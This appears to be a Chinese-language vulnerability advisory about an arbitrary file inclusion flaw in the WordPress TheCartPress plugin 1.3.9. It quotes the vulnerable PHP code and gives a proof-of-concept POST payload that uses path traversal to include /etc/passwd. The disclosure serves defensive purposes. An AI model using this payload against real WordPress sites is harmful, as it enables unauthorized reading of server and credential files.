WordPress TheCartPress Plugin 1.3.9...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

<ul><li>checkout/CheckoutEditor.class.php</li></ul><pre class="">function admin_action() { if ( empty( $_POST ) ) return; if ( isset( $_REQUEST['tcp_save_fields'] ) ) { $partial_path = $_REQUEST['tcp_box_path']; $class_name = $_REQUEST['tcp_box_name']; $initial_path = dirname( dirname( TCP_ADMIN_FOLDER ) ) . '/'; require_once( $initial_path . $partial_path ); $box = new $class_name(); $box-&gt;save_config_settings(); $this-&gt;updated = true; } elseif ( isset( $_REQUEST['tcp_restore_default'] ) ) { TCPCheckoutManager::restore_default(); $this-&gt;updated = true; } }<br></pre><p>用户传入的tcp_box_path直接带入require语句,造成任意文件包含漏洞。<br></p><p>以管理员身份登录,访问地址:</p><pre class="">http://10.211.55.3/wp-admin/admin.php?page=checkout_editor_settings</pre><p>POST数据:</p><pre class="">tcp_save_fields=1&amp;tcp_box_path=../../../../../../../../../../etc/passwd</pre><p>成功包含文件:</p><p><br></p><p><img alt="9EB9CA2B-35A3-43F6-96C6-F84C608F3835.png"...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息